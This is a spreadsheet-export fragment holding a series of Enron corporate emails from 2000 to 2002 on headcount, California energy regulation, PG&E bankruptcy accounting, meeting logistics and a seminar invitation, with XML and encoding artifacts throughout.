From:  Apollo, Beth  _x000D_
Sent: Tuesday, May 08, 2001 3:52 PM_x000D_
To: Brown, Suzanne_x000D_
Cc: Beck, Sally_x000D_
Subject: FW: 1998 to 2001 Headcount_x000D_
_x000D_
_x000D_
Suzanne  -- here is a summary of our headcount by group from 98 to 2001 (plan)_x000D_
_x000D_
There is some verbage discussion about major business changes that have had _x000D_
an effect, and also we attached 2 graphs which show the Huge increase in the _x000D_
number of new deals (from the introduction of EOL in fall of 1999).  1000% _x000D_
for Gas and 500% for all products on an average basis, which would certainly _x000D_
account for a level of headcount growth, which we believe has been minimal in _x000D_
relation to the huge growth in transactions and commodities since 1999_x000D_
_x000D_
Hopefully, this will help you answer the questions.  I am happy to discuss _x000D_
any other info we can provide or slice the info a different way, if _x000D_
necessary.  Just let me know._x000D_
_x000D_
Beth_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Heinrich, Brian  _x000D_
Sent: Tuesday, May 08, 2001 3:33 PM_x000D_
To: Apollo, Beth_x000D_
Subject: 1998 to 2001 Headcount_x000D_
_x000D_
Beth,_x000D_
Attached is the headcount file, with the graphs updated._x000D_
If you have any questions, let me know._x000D_
Thanks,_x000D_
Brian_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 08:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Swaps Monitor Research.</t>
  </si>
  <si>
    <t xml:space="preserve">Elena,_x000D_
_x000D_
Please, review the energy related info in this database (if any) and talk to _x000D_
me _x000D_
about it._x000D_
_x000D_
I would like to do some research in this area and ask you to write a summary _x000D_
report._x000D_
Nothing urgent._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 10/12/2000 _x000D_
03:52 PM ---------------------------_x000D_
_x000D_
_x000D_
Andrei Osonenko &lt;andrei@swapsmonitor.com&gt; on 10/11/2000 04:26:38 PM_x000D_
To: (Recipient list suppressed)_x000D_
cc:  _x000D_
Subject: Swaps Monitor Research._x000D_
_x000D_
_x000D_
We have today published information about the OTC derivative activities of _x000D_
the largest Dutch dealers. This research is contained in the attached pdf _x000D_
file._x000D_
_x000D_
Through our web site, SwapsMonitor.com, you can obtain additional information _x000D_
about OTC derivatives dealers, including rankings and a database of _x000D_
outstandings going back to 1994._x000D_
_x000D_
As an e-mail subscriber to our research, you will automatically receive all _x000D_
free research at the same time it is placed on our web site. If you wish to _x000D_
remove your name from the e-mailing list, please use the Reply feature of _x000D_
your e-mail application and type the word "Remove" in the subject line._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
 - dutch_dealers.pdf_x000D_
Andrei Osonenko_x000D_
Research Department_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 00:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.frank@enron.com', 'twanda.sweet@enron.com', 'michael.tribolet@enron.com', 'james.steffes@enron.com'})</t>
  </si>
  <si>
    <t>RE: PG&amp;E Action before Bankruptcy Court</t>
  </si>
  <si>
    <t xml:space="preserve">I have asked my asst, Twanda Sweet, to set up a meeting on Tues re this _x000D_
issue. I will include Mike Day. Is there anyone else that should be in this _x000D_
meeting---EES legal?_x000D_
----- Forwarded by Richard B Sanders/HOU/ECT on 05/25/2001 07:41 AM -----_x000D_
_x000D_
	Michael Tribolet/ENRON@enronXgate_x000D_
	05/24/2001 10:08 AM_x000D_
		 _x000D_
		 To: Robert Frank/NA/Enron@Enron, Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: RE: PG&amp;E Action before Bankruptcy Court_x000D_
_x000D_
_x000D_
PG&amp;E want to fight the TURN accounting as it, basically, wiped out hopes of _x000D_
collecting their undercollected amount from a regulatory accounting _x000D_
perspective.   The company has said they need to keep the old accounting _x000D_
convention alive, as it would bolster their chance for recovery in the _x000D_
litigation on the just and reasonable argument in Federal District Court._x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Frank, Robert  _x000D_
Sent: Thursday, May 24, 2001 9:50 AM_x000D_
To: Tribolet, Michael; Sanders, Richard_x000D_
Subject: PG&amp;E Action before Bankruptcy Court_x000D_
_x000D_
Can either of you help me get Jim an answer?_x000D_
---------------------- Forwarded by Robert Frank/NA/Enron on 05/24/2001 09:49 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
James D Steffes_x000D_
05/24/2001 09:20 AM_x000D_
To: Robert Frank/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: PG&amp;E Action before Bankruptcy Court_x000D_
_x000D_
Bob --_x000D_
_x000D_
Monday, May 14 PG&amp;E asked the Court to stay the PUC's March 27 Order on _x000D_
accounting procedures.  Where is this going?  This would be very bad._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 18:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ted.hall@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'mson@softbank.co.jp'})</t>
  </si>
  <si>
    <t>Meeting with Jeff Skilling at Enron</t>
  </si>
  <si>
    <t xml:space="preserve">Please respond to TedHallMasa:_x000D_
_x000D_
I enjoyed our evening together on the boat in Yokohama harbor very_x000D_
much.  As promised, I have been in contact with Jeff Skilling at Enron._x000D_
He is interested in meeting with you._x000D_
_x000D_
I have been speaking with Jeff's assistant regarding appropriate dates_x000D_
and mentioned the dates when you will be in New York in May.  I suggest_x000D_
that your respective offices work together to settle the logistical_x000D_
details.  Joannie Williamson will handle the arrangements for Jeff._x000D_
(e-mail: joannie.williamson@enron.com; phone: 713-345-7774)_x000D_
_x000D_
I am sure you will have a very interesting conversation._x000D_
_x000D_
If I can help in any other way, please let me know._x000D_
_x000D_
Very best regards,_x000D_
_x000D_
Ted_x000D_
_x000D_
 - tedhall.vcf </t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 01:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'peter.weidler@enron.com'})</t>
  </si>
  <si>
    <t>Re: GTB construction</t>
  </si>
  <si>
    <t>That is not the issue.  By putting us in the middle between GTB and Solar we _x000D_
would be the ones that would have to resolve any differances between the wo _x000D_
if the unit does not function properly.  The whole deal gets complicated _x000D_
since there is a design engineer. oerator and equipment manufacturer and we _x000D_
get in the middle between the equipment manufacturer and owner.  If the unit _x000D_
does operate properly, everyone will point fingers at everyone else,  I have _x000D_
seen this happen coutless times on EE&amp;CC projects.  Why do I want to take _x000D_
this risk on an international project that according to Jerry's own numbers _x000D_
gets me about $800,ooo in current perios earnings and another $400'ooo _x000D_
deferred over many years.  It just is not worth the time and risk for that _x000D_
kind of money.  I think Phil Lowry agrees with this assessment also.</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 22:56:40 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/18/02; HourAhead hour: 21;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 06:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: REVISED Reg. Affairs Washington Staff Meeting- 12:30 p.m.</t>
  </si>
  <si>
    <t xml:space="preserve">Mary Hain has resigned her position with Enron.  Please remove her from all _x000D_
your mail lists._x000D_
_x000D_
Thank you._x000D_
_x000D_
Lysa Akin_x000D_
Gov't Affairs - Sr. Admin. Ass't._x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Jackie Gallagher" &lt;JGallagher@epsa.org&gt;                           _x000D_
03/28/2001 08:16 AM_x000D_
	_x000D_
_x000D_
To: &lt;bhawkin@enron.com&gt;, &lt;bmerola@enron.com&gt;, &lt;christi.l.nicolay@enron.com&gt;, _x000D_
&lt;donna.fulton@enron.com&gt;, &lt;janelle.scheuer@enron.com&gt;, _x000D_
&lt;jeff_brown@enron.com&gt;, &lt;jhartso@enron.com&gt;, &lt;jsteffe@enron.com&gt;, _x000D_
&lt;Mary.Hain@enron.com&gt;, &lt;rshapiro@enron.com&gt;, &lt;sarah.novosel@enron.com&gt;, _x000D_
&lt;tom.hoatson@enron.com&gt;_x000D_
cc:  _x000D_
Subject: REVISED Reg. Affairs Washington Staff Meeting- 12:30 p.m._x000D_
_x000D_
_x000D_
MEMORANDUM_x000D_
_x000D_
TO: Regulatory Affairs Committee-Board and Associate Members Only_x000D_
       Power Marketers Working Group_x000D_
_x000D_
FROM: Joe Hartsoe, Regulatory Affairs Committee Chair_x000D_
            Bob Reilley, Power Marketers Working Group Chair_x000D_
            Julie Simon, Vice President of Policy_x000D_
            Mark Bennett, Senior Manager of Policy_x000D_
            Erin Perrigo, Manager of Policy_x000D_
_x000D_
DATE: March 28, 2001_x000D_
_x000D_
RE: REVISED Regulatory Affairs Washington Staff Meeting-_x000D_
      12:30 p.m._x000D_
_x000D_
Due to a conflict with another meeting, the Washington Regulatory Staff _x000D_
meeting for tomorrow has been pushed back to 12:30 p.m.  If you have any _x000D_
questions, please contact Jackie Gallagher at 202-628-8200 or _x000D_
jgallagher@epsa.org._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 03:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'harry.kingerski@enron.com', 'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com', 'susan.mara@enron.com', 'jennifer.thome@enron.com'})</t>
  </si>
  <si>
    <t>What Did the CPUC Mean by Not Charging DA with the 3c/kwh_x000D_
 Surcharge?</t>
  </si>
  <si>
    <t xml:space="preserve">Guys and Gals --_x000D_
_x000D_
Commercial wants our opinion (in fact they want us to contact the CPUC and _x000D_
legislative members) to gauge the "true" meaning of the DA bypass of the _x000D_
3c/kwh Surcharge.  This question basically has arisen because there is a _x000D_
customer that we may not re-DASR if the Surcharge bypass extends in _x000D_
perpetuity (or if at least is there a Window of Opportunity that keeps _x000D_
customers from paying).  Put in other words, would anyone give us a "free _x000D_
pass" if we move load to DA right now and promise to keep them there with no _x000D_
ability to return to electric utility service?_x000D_
_x000D_
My current analysis looks something like this --_x000D_
_x000D_
The term "Surcharge" is only applicable until the end of the AB1890 rate _x000D_
freeze (which will end no later than March.1.02 and may end earlier if (a) _x000D_
federal court finds in PG&amp;E/SCE favor or (b) California legislature mandates _x000D_
an earlier end-date.  Surcharge is a "term of art" to get around the problems _x000D_
of the AB1890 rate freeze._x000D_
At the end of the AB1890 rate freeze, it is my understanding that the CPUC _x000D_
will modify fully the rate structure and level to ensure full cost recovery _x000D_
on a going forward basis (therefore Utility Retained Generation, QF expense, _x000D_
CDWR current expenses (both energy purchase and financing costs will be _x000D_
included)._x000D_
Other outstanding costs will include (1) Utility Undercollection from May.00 _x000D_
until when no additional CA-ISO costs are applied) and (2) CDWR costs _x000D_
beginning Jan.17.01 until the end of AB1890 rate freeze new rates._x000D_
Understanding how these costs will be recovered and by whom will most likely _x000D_
(70%) be decided by the Legislature with some decision-making by the CPUC._x000D_
Utility Undercollection Bypass - 25%_x000D_
CDWR Jan.17.01 thru AB1890 end Bypass - 80% for people who never were on _x000D_
Utility Service, 10% for people who used Utility Service post Jan.17.01_x000D_
CDWR Net Unavoidable Bypass - 10% for people who used Utility Service post _x000D_
Jan.17.01, 80% for others._x000D_
_x000D_
LEGISLATION IMPACTING THIS DECISION_x000D_
_x000D_
There are three key direct access bills being considered (the Bowen bill - _x000D_
SB2x27, the Kelley bill - AB2x42, and the Battin bill - SB2x??)._x000D_
_x000D_
The Bowen bill would remove the DA suspension authority granted in AB1x1 and _x000D_
replace it with the following (1) if a customer has not bought from an _x000D_
electric utility on or after Jan.17.01 there are no charges [except there may _x000D_
be an entrance fee to use the electric utility going forward] and (2) if a _x000D_
customer wants to switch from an electric utility to an ESP they must pay "to _x000D_
the department any uncollected amounts equivalent to the department's net _x000D_
unavoidable cost of power procurement, including any financing costs, _x000D_
attributable to that customer" to ensure the satisfaction of any power _x000D_
purchase obligation or bond obligation to serve "that customer".  The _x000D_
recovery period shall be coincident with the terms of bonds issued to finance _x000D_
the purchases.  The CPUC has 90 days from the effective date to notify _x000D_
customers of their obligations.  _x000D_
_x000D_
The Kelley bill would remove the DA suspension authority granted in AB1x1 and _x000D_
replace it with the following (1) if a customer has not bought from an _x000D_
electric utility on or after Jan.17.01 there are no charges, (2) every _x000D_
customer is allowed to buy from an ESP a % of their load equal to the amount _x000D_
served by Utility Retained Generation (not CDWR purchases) with no charges, _x000D_
(3) after the effective date, any customer that buys from the electric _x000D_
utility and wants to switch must pay "to ensure satisfaction of any power _x000D_
purchase obligation or bond obligation incurred by the department" with the _x000D_
following constraints - (a) for res and small commercial customers, if DA _x000D_
load is less than load growth or (b) to self gen customers, if the customer _x000D_
has given 180 days prior notification or (c) if the customer has given DWR 12 _x000D_
months' advance written notice (then only a fee equal to 12 months _x000D_
unavoidable costs).  The CPUC has 30 days from the effective date to notify _x000D_
customers of their obligations._x000D_
_x000D_
The Battin bill would ... still reviewing_x000D_
_x000D_
CPUC DECISIONS IMPACTING THIS_x000D_
_x000D_
May 5 Order - DA doesn't pay current DWR expenses.  Good for bypass of these _x000D_
costs._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 13:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: A.00-11-038 Rate Design Proposal of the Energy  Producers_x000D_
 and 	User s</t>
  </si>
  <si>
    <t xml:space="preserve">Oh, that's very funny.  Just like the good old days?_x000D_
_x000D_
_x000D_
_x000D_
	Prentice Sellers &lt;psellers@Haas.Berkeley.EDU&gt;_x000D_
	04/16/2001 06:49 PM_x000D_
		 _x000D_
		 To: Jeff.Dasovich@enron.com_x000D_
		 cc: _x000D_
		 Subject: Re: FW: A.00-11-038 Rate Design Proposal of the Energy  Producers _x000D_
and  User s_x000D_
_x000D_
Did you want me to summarize these for you?_x000D_
_x000D_
At 08:37 PM 4/15/2001 -0500, you wrote:_x000D_
_x000D_
&gt;----- Forwarded by Jeff Dasovich/NA/Enron on 04/15/2001 08:30 PM -----_x000D_
&gt; _x000D_
&gt;_x000D_
&gt;                     JBennett _x000D_
 &gt;_x000D_
&gt;                     &lt;JBennett@GMS        To:     "'Harry Kingerski _x000D_
&gt; (E-mail)'"_x000D_
&gt;                     SR.com&gt;              &lt;Harry.Kingerski@enron.com&gt;, _x000D_
&gt; "'dblack@enron.com'"_x000D_
&gt;                                          &lt;dblack@enron.com&gt;, _x000D_
&gt; "'James.D.Steffes@enron.com'"_x000D_
&gt;                     04/14/2001           &lt;James.D.Steffes@enron.com&gt;, _x000D_
&gt; "'jlewis@enron.com'"_x000D_
&gt;                     09:39 AM             &lt;jlewis@enron.com&gt;, _x000D_
&gt; "'Jeff.Dasovich@enron.com'"_x000D_
&gt;                                          &lt;Jeff.Dasovich@enron.com&gt;, _x000D_
 &gt;_x000D_
&gt;                                          "'Paul.Kaufman@enron.com'" _x000D_
 &gt;_x000D_
&gt;                                          &lt;Paul.Kaufman@enron.com&gt;, _x000D_
 &gt;_x000D_
&gt;                                          "'Robert.Neustaedter@enron.com'" _x000D_
 &gt;_x000D_
&gt;                                          &lt;Robert.Neustaedter@enron.com&gt;, _x000D_
 &gt;_x000D_
&gt;                                          "'Susan.J.Mara@enron.com'" _x000D_
 &gt;_x000D_
&gt;                                          &lt;Susan.J.Mara@enron.com&gt;, _x000D_
&gt; "'tjohnso8@enron.com'"_x000D_
&gt;                                          &lt;tjohnso8@enron.com&gt;, _x000D_
&gt; "'Leslie.Lawner@enron.com'"_x000D_
&gt;                                          &lt;Leslie.Lawner@enron.com&gt; _x000D_
 &gt;_x000D_
&gt;                                          cc: _x000D_
 &gt;_x000D_
&gt;                                          Subject:     FW: A.00-11-038 _x000D_
&gt; Rate Design Proposal_x000D_
&gt;                                          of the Energy Producers _x000D_
&gt; and      User s_x000D_
&gt; _x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Phil Vizcarra [mailto:pav@a-klaw.com]_x000D_
&gt;Sent: Friday, April 13, 2001 3:17 PM_x000D_
&gt;To: jbushee@sablaw.com; kmccrea@sablaw.com; callen@akingump.com;_x000D_
&gt;jweisgall@aol.com; rogerberliner@bcjlaw.com; rcsstl@cdmnet.com;_x000D_
&gt;mbrubaker@consultbai.com; anchau@shellus.com;_x000D_
&gt;keith-sappenfield@reliantenergy.com; jsmollon@newwestenergy.com;_x000D_
&gt;jlyoung@sempra.com; napedersen@jonesday.com; athomas@newenergy.com;_x000D_
&gt;kmcspadd@milbank.com; hchoy@isd.co.la.ca.us; lgurick@calpx.com;_x000D_
&gt;douglass@arterhadden.com; randy_britt@mayco.com; dmarshall@greggind.com;_x000D_
&gt;frank.cooley@sce.com; glwaas@calpx.com; uwuaregion5@earthlink.net;_x000D_
&gt;fmo@sdcity.sannet.gov; jleslie@luce.com; julesan@aol.com;_x000D_
&gt;mshames@ucan.org; jparrott@sempra.com; kmelville@sempra.com;_x000D_
&gt;riald@kindermorgan.com; bill.mccallum@ci.fresno.ca.us;_x000D_
&gt;btenney@landuselaw.com; ronknecht@aol.com;_x000D_
&gt;furutanj@efawest.navfac.navy.mil; kpoole@adamsbroadwell.com;_x000D_
&gt;mdjoseph@adamsbroadwell.com; freedman@turn.org; rcosta@turn.org;_x000D_
&gt;bfinkelstein@turn.org; theresa_mueller@ci.sf.ca.us; jjz@cpuc.ca.gov;_x000D_
&gt;chrisw@greenlining.org; joseh@lif.org; Evelyn Kahl; jnnc@chevron.com;_x000D_
&gt;jlondon@gralegal.com; imoosen@gralegal.com; clpearce@duanemorris.com;_x000D_
&gt;phanschen@mofo.com; tmberliner@duanemorris.com; dpritchard@mofo.com;_x000D_
&gt;smoss@hooked.net; epoole@adplaw.com; chilen@llgm.com; jsqueri@gmssr.com;_x000D_
&gt;jbennett@gmssr.com; bloomje@la.whitecase.com; pbray@newpower.com;_x000D_
&gt;rick.counihan@greenmountain.com; thoulihan@mdbe.com; mday@gmssr.com;_x000D_
&gt;jmalkin@orrick.com; edwardoneill@dwt.com; lindseyhowdowning@dwt.com;_x000D_
&gt;jguzman@nossaman.com; whe1@pge.com; ssmyers@worldnet.att.net;_x000D_
&gt;pxo2@pge.com; pat.williams@dhcmail.com; wbooth@booth-law.com;_x000D_
&gt;jerryl@abag.ca.gov; mgomez1@bart.gov; askaff@energy-law-group.com;_x000D_
&gt;pjpowerlaw@aol.com; difellman@energy-law-group.com;_x000D_
&gt;nryan@environmentaldefense.org; rschmidt@bartlewells.com;_x000D_
&gt;rrcollins@n-h-i.org; patrickm@crossborderenergy.com;_x000D_
&gt;tomb@crossborderenergy.com; brbarkovich@earthlink.net;_x000D_
&gt;pmcdonne@wenet.net; pjmuller@ricochet.net; jbradley@svmg.org;_x000D_
&gt;tsmegal@calwater.com; sberlin@mccarthylaw.com; bishop@jrwood.com;_x000D_
&gt;cwrmccv@worldnet.att.net; scottst@mid.org; bill@jbsenergy.com;_x000D_
&gt;cmkehrein@ems-ca.com; jweil@aglet.org; abb@eslawfirm.com;_x000D_
&gt;bpowers@seniors.org; dcarroll@dbsr.com; dkk@eslawfirm.com; ed@clfp.com;_x000D_
&gt;jtachera@energy.state.ca.us; howens@seniors.org;_x000D_
&gt;sgreenberg@realenergy.com; tknox@klalawfirm.com; smutny@iepa.com;_x000D_
&gt;lmh@eslawfirm.com; hodgesjl@pacbell.net; rpernell@energy.state.ca.us;_x000D_
&gt;kmills@cfbf.com; rliebert@cfbf.com; aorchar@smud.org; Michael Alcantar;_x000D_
&gt;jcpaine@stoel.com; mhg@hetrading.com; dws@keywaycorp.com;_x000D_
&gt;hbd@gweiss.com; gerhordt.herbert@msdw.com; cread@steptoe.com;_x000D_
&gt;jogg@jhenergy.com; peter_fox-penner@brattle.com;_x000D_
&gt;DavoodiKR@efaches.navfac.navy.mil; bill.wells@afcesa.af.mil;_x000D_
&gt;ad046@detroit.freenet.org; bob_anderson@apses.com; gdreed@sidley.com;_x000D_
&gt;robert.d.schasel@fritolay.com; cyounger@manatt.com; dhuard@manatt.com;_x000D_
&gt;rkeen@manatt.com; georgeperrault@msn.com; picketse@sce.com;_x000D_
&gt;jsilva@edisonenterprises.com; jherrera@dpw.co.la.ca.us;_x000D_
&gt;LVanWagenen@sempra.com; jbarthrop@powersavers.com; foothill@lmi.net;_x000D_
&gt;fosterbc@sce.com; ljhubbard@sempra.com; ktilton@gralegal.com;_x000D_
&gt;mpatel@brownwoodlaw.com; paul.harris@bridge.com; oshirock@pacbell.net;_x000D_
&gt;natutt@duanemorris.com; j3m9@pge.com; musicamaria@yahoo.com;_x000D_
&gt;derkp@newsdata.com; luluw@newsdata.com; tom.oneill@abnamro.com;_x000D_
&gt;mmattes@nossaman.com; RJP2@pge.com; brb3@pge.com; ell5@pge.com;_x000D_
&gt;jyf1@pge.com; NXK2@pge.com; rrh3@pge.com; alexm@calpine.com;_x000D_
&gt;gtbl@dynegy.com; joe.paul@dynegy.com; honest@compuserve.com;_x000D_
&gt;jyoung@ebmud.com; jon.jacobs@paconsulting.com;_x000D_
&gt;emitchel@angnewspapers.com; jptang@oaklandcityattorney.org;_x000D_
&gt;rbw@mrwassoc.com; dmarcus@slip.net; jeff@hmhresources.com; ed@apx.com;_x000D_
&gt;wendy@econinsights.com; chrism@mid.org; fwmonier@tid.org;_x000D_
&gt;rmccann@cal.net; blaising@braunlegal.com; melanie_gillette@rmiinc.com;_x000D_
&gt;twetzel@thermoecotek.com; Slayman@energy.state.ca.us;_x000D_
&gt;swchurchill@juno.com; jdh@eslawfirm.com; ddavie@hesinet.com;_x000D_
&gt;karen@klindh.com; cpeyton@sacbee.com; thaines@smud.org;_x000D_
&gt;huse@eesconsulting.com; mer@cpuc.ca.gov; awp@cpuc.ca.gov;_x000D_
&gt;cmw@cpuc.ca.gov; ctd@cpuc.ca.gov; bsl@cpuc.ca.gov; dlf@cpuc.ca.gov;_x000D_
&gt;fua@cpuc.ca.gov; jlo@cpuc.ca.gov; jsw@cpuc.ca.gov; jrd@cpuc.ca.gov;_x000D_
&gt;jmh@cpuc.ca.gov; kok@cpuc.ca.gov; kim@cpuc.ca.gov; llk@cpuc.ca.gov;_x000D_
&gt;lss@cpuc.ca.gov; mv1@cpuc.ca.gov; pmd@cpuc.ca.gov; gig@cpuc.ca.gov;_x000D_
&gt;rtf@cpuc.ca.gov; raw@cpuc.ca.gov; sfc@cpuc.ca.gov; car@cpuc.ca.gov;_x000D_
&gt;txb@cpuc.ca.gov; ztc@cpuc.ca.gov; nevillm@hdcdojnet.state.ca.us;_x000D_
&gt;dwrlegal1@water.ca.gov; ath@cpuc.ca.gov; LKristov@energy.state.ca.us;_x000D_
&gt;randy.chinn@senate.ca.gov; firmiyas@dof.ca.gov; rax@cpuc.ca.gov;_x000D_
&gt;rtavares@energy.state.ca.us; mschwebs@energy.state.ca.us_x000D_
&gt;Subject: A.00-11-038 Rate Design Proposal of the Energy Producers and_x000D_
&gt;User s_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Attached pursuant to the Assigned Commissioner Ruling in A.00-11-038 et_x000D_
&gt;al is the Rate Design Proposal of the Energy Producers and Users_x000D_
&gt;Coalition.  The proposal includes three attachments:_x000D_
&gt;_x000D_
&gt;1.   Prepared Direct Testimony of Donald W. Schoenbeck on Behalf of the_x000D_
&gt;Energy Producers and Users Coalition and Rate Spread and Rate Design_x000D_
&gt;Proposal (Schedule 1)._x000D_
&gt;_x000D_
&gt;2.    Schedule 2:  EPUC ACR Template for Southern California Edison_x000D_
&gt;Company._x000D_
&gt;_x000D_
&gt;3.    Schedule 3: EPUC ACR Template for Pacific Gas and Electric_x000D_
&gt;Company._x000D_
&gt;_x000D_
&gt;Should you have any problems opening the attached documents, please let me_x000D_
&gt;know._x000D_
&gt;_x000D_
&gt;Phil Vizcarra_x000D_
&gt;Alcantar &amp; Kahl LLP_x000D_
&gt;_x000D_
&gt;  &lt;&lt;EPUC Rate Design Testimony .doc&gt;&gt;  &lt;&lt;Exhibit DWS Schedule 2 EPUC Rate_x000D_
&gt;Design Testimony .doc&gt;&gt;  &lt;&lt;Exhibit DWS Schedule 3 EPUC Rate Design_x000D_
&gt;Testimony_x000D_
&gt;.doc&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;(See attached file: EPUC Rate Design Testimony .doc)_x000D_
&gt;(See attached file: Exhibit DWS Schedule 2 EPUC Rate Design Testimony .doc)_x000D_
&gt;(See attached file: Exhibit DWS Schedule 3 EPUC Rate Design Testimony .doc)_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 14:49:16 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kenny.foo@ngx.com'})</t>
  </si>
  <si>
    <t>NGX - Collateral</t>
  </si>
  <si>
    <t>Hi Louise._x000D_
_x000D_
We received CAD$6.5million from Enron today.  Thank you for your help._x000D_
_x000D_
Regards_x000D_
_x000D_
Kenny_x000D_
NGX Financial Inc</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 02:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wednesday meeting</t>
  </si>
  <si>
    <t>___________________x000D_
_x000D_
I have set up a meeting with Carol for Wednesday April 11 @ 9:00._x000D_
_x000D_
Nick Ernst</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 05:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.montovano@enron.com', 'james.steffes@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Pennsylvania's Electricity Market: Can California Happen Here?</t>
  </si>
  <si>
    <t>FYI._x000D_
----- Forwarded by Jeff Dasovich/NA/Enron on 03/19/2001 01:57 PM -----_x000D_
_x000D_
=09"PennFuture" &lt;pennfuture@pennfuture.org&gt;_x000D_
=0903/19/2001 01:52 PM_x000D_
=09Please respond to "PennFuture"_x000D_
=09=09=20_x000D_
=09=09 To: &lt;pennfuture@pennfuture.org&gt;_x000D_
=09=09 cc:=20_x000D_
=09=09 Subject: Pennsylvania's Electricity Market: Can California Happen He=_x000D_
re?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The Greater Pittsburgh Chamber of Commerce_x000D_
=20_x000D_
_x000D_
in collaboration with PennFuture_x000D_
_x000D_
cordially invites you to a luncheon  seminar,_x000D_
=20_x000D_
_x000D_
"Pennsylvania=01,s Electricity Market:=20_x000D_
_x000D_
Can California Happen Here?"_x000D_
=20_x000D_
_x000D_
Two of the country=01,s leading experts in electricity markets will:_x000D_
_x000D_
share their perspectives on current national trends in energy policy, =20_x000D_
discuss the problems in California=01,s deregulated electricity market,_x000D_
compare that with the Pennsylvania experience,_x000D_
suggest ways to enhance Pennsylvania=01,s energy policy to prevent =20_x000D_
California-style price spikes and electricity shortages in the future. =20_x000D_
_x000D_
_x000D_
_x000D_
Speakers will also detail how Pennsylvania is positioned to take advantage=_x000D_
=20_x000D_
of  renewable energy, and how diversifying our energy portfolio can benefit=_x000D_
=20_x000D_
our  economy, our environment, and our energy security._x000D_
=20_x000D_
_x000D_
April 3, 2001 - 12:00 to 2:00 p.m._x000D_
_x000D_
Omni William Penn Hotel =01) Pittsburgh_x000D_
_x000D_
530 William Penn Place_x000D_
_x000D_
Admission is free -- RSVP required_x000D_
=20_x000D_
_x000D_
Moderated by Bill Hopwood, President, Springhouse Energy Systems._x000D_
=20_x000D_
_x000D_
Featured Speakers:_x000D_
=20_x000D_
_x000D_
Karl R?bago, Managing Director, Rocky Mountain Institute_x000D_
=20_x000D_
_x000D_
A former Public Utility Commissioner for the State of Texas and Deputy =20_x000D_
Assistant Secretary for Utility Technologies for the U.S. DOE, R?bago has=_x000D_
=20_x000D_
played  a leadership role in shaping the national agenda in utility=20_x000D_
regulation and  restructuring, energy efficiency and renewable energy. An=_x000D_
=20_x000D_
expert on new personal  power energy markets, R?bago currently consults wit=_x000D_
h=20_x000D_
large and small businesses,  government agencies and other organizations to=_x000D_
=20_x000D_
practically and profitably  implement principles of sustainability through=_x000D_
=20_x000D_
Natural  Capitalism._x000D_
=20_x000D_
_x000D_
John Hanger, President and CEO, Citizens for Pennsylvania=01,s Future =20_x000D_
(PennFuture)_x000D_
=20_x000D_
_x000D_
John Hanger is President and CEO of PennFuture, a statewide public interest=_x000D_
, =20_x000D_
membership group that works to protect Pennsylvania=01,s environment and=20_x000D_
improve  its economy. From 1993 to 1998, Hanger served as a Commissioner wi=_x000D_
th=20_x000D_
the  Pennsylvania Public Utility Commission, and has been described by the =_x000D_
=20_x000D_
Philadelphia Inquirer, the Pittsburgh Post-Gazette and the  Harrisburg=20_x000D_
Patriot-News as the "architect," "the lynchpin" and the  "driving force" of=_x000D_
=20_x000D_
Pennsylvania=01,s transition to electric competition. Hanger  testifies and=_x000D_
=20_x000D_
speaks throughout the nation on energy and environment issues,  public=20_x000D_
utility regulation, and competition in the electricity industry. =20_x000D_
_x000D_
_x000D_
Please join us! For more information, or to register: call  PennFuture at=_x000D_
=20_x000D_
717-214-7920, fax the attached form to 717-214-7927, or send an  email to=_x000D_
=20_x000D_
pennfuture@pennfuture.org by  Wednesday, March 28, 2001.=20_x000D_
_x000D_
_x000D_
As someone concerned with Pennsylvania's environment, economy and energy =_x000D_
=20_x000D_
issues, we thought you would be interested in this event. If you prefer not=_x000D_
=20_x000D_
